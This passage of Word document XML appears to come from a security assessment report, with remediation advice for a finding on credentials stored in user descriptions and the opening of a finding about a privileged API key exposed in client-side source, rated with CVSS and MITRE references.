          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>any</w:t>
      </w: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 xml:space="preserve"> PII</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5FC10A8A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> stored under their account</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7DE4360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012CFA0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Depending on the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="35F2DF0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3012CFA0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the compromised user, the</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6EE5702D">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 </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="73A80648">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can potentially compromise other aspects of the application, laterally move across the system, a</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="07926EE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nd access the PII of other users</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="77B75389">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0B1C8619" w14:textId="2024FEC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50E01CC" w:rsidP="0D325B6E" w:rsidRDefault="250E01CC" w14:paraId="2F06E19D" w14:textId="3A49D23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D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6A12CAE2" w14:textId="3791CEB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50E01CC" w:rsidP="0D325B6E" w:rsidRDefault="250E01CC" w14:paraId="5CF85067" w14:textId="1591543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50E01CC" w:rsidP="0D325B6E" w:rsidRDefault="250E01CC" w14:paraId="17BE82A5" w14:textId="556E075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50E01C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4B15289" w:rsidP="0D325B6E" w:rsidRDefault="64B15289" w14:paraId="64B84599" w14:textId="4104C4F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>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4B15289">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce credential storage policies to ensure credentials are not </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="58B08C16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stored</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="64B15289">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in unencrypted, and easily accessible methods.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6897AADB" w:rsidP="0D325B6E" w:rsidRDefault="6897AADB" w14:paraId="01222B7E" w14:textId="281DC24B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>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897AADB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Audit a</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6897AADB">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6897AADB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">l user descriptions and remove any sensitive information stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6897AADB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>description.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D139D82" w:rsidP="0D325B6E" w:rsidRDefault="4D139D82" w14:paraId="25A0CF40" w14:textId="532BDAF3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>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D139D82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Require the use of multi-factor authentication (MFA) by all users </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6613A9D7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4D139D82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> minimize the risk of </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C5C6372">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">leaked credentials being abused by </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C5C6372">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C5C6372">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tackers</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4D139D82">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32DDBEDA" w14:textId="033DB39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250E01CC" w:rsidP="0D325B6E" w:rsidRDefault="250E01CC" w14:paraId="0CBAEF4F" w14:textId="28E00F8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0E01CC">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3ABAAA9" w:rsidP="0D325B6E" w:rsidRDefault="53ABAAA9" w14:paraId="6B9DBB05" w14:textId="28BF21C5">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R17cbe33c30cb4b5e">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="53ABAAA9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>DigiCert - Creating Password Policy Best Practices</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="53ABAAA9" w:rsidP="0D325B6E" w:rsidRDefault="53ABAAA9" w14:paraId="6EE7BA3B" w14:textId="19E9CBAD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R54496870144a49bf">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="53ABAAA9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Palo Alto Networks - What is Multifactor Authentication (MFA) Implementation?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4D9E35A6" w14:textId="763EC8DE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="357832C9" w14:textId="7C6414A2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="1391A402" w:rsidP="0D325B6E" w:rsidRDefault="1391A402" w14:paraId="73A79D9F" w14:textId="77A7C328">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1391A402">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1391A402">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">H1: </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="004C9138">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Privileged</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1C4E8773">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Public </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1391A402">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1391A402">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Key</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1"/>
        <w:gridCol w:w="1591"/>
        <w:gridCol w:w="2490"/>
        <w:gridCol w:w="4335"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="61CEFDD1">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1DAC50A" w14:textId="748B9F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056730" w14:textId="280C295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8B53176" w14:textId="5D16081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23DDFE2">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099027" w14:textId="78904DC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B482D31" w14:textId="02CD7B11">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D5FCBCC" w14:textId="3B37FD6E">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8.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="71CA80EB">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>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7F83BA9" w14:textId="783E0567">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="34C47D31">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>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E2263D" w14:textId="15BE6BE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1A2791D" w14:textId="69A6E32A">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58CEC93"/>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C8AEEFC"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="5CBF5151">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44B0D54" w14:textId="46F9B8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A979960" w:rsidP="0D325B6E" w:rsidRDefault="5A979960" w14:paraId="3A70A575" w14:textId="5EAA71EE">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" r:id="R4ce5d9d1ebb845a5">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5A979960">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="5711653C">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1591"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B9B9A6" w14:textId="0DAC1F28">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7274DED" w14:textId="2F9CEDC8">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243C261" w:rsidP="0D325B6E" w:rsidRDefault="0243C261" w14:paraId="5C9FD13D" w14:textId="4D966C57">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R87f41b38b822401b">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0243C261">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1190: Exploit Public-Facing Application</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="6830AAF9">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1591"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F0B7896"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1591"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629A98" w14:textId="7E636C06">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9953A4A" w:rsidP="0D325B6E" w:rsidRDefault="09953A4A" w14:paraId="4F074D33" w14:textId="4DFC1325">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rc7bf49b666ec4414">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="09953A4A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1054: Software Configuration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="6E527FF9">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="318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3F0899" w14:textId="31749C3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D31312A" w14:textId="0879A465">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="66B12C04" w14:textId="082E4309">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1391A402" w:rsidP="0D325B6E" w:rsidRDefault="1391A402" w14:paraId="5D8F4175" w14:textId="0DF60E4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91A40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3DBF4E7" w:rsidP="0D325B6E" w:rsidRDefault="03DBF4E7" w14:paraId="23710D60" w14:textId="420E6F3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DBF4E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">An API key for the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3A586E90">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0D325B6E" w:rsidR="0A0452C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16B4209">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is contained within the client-side source </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="506EDFE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
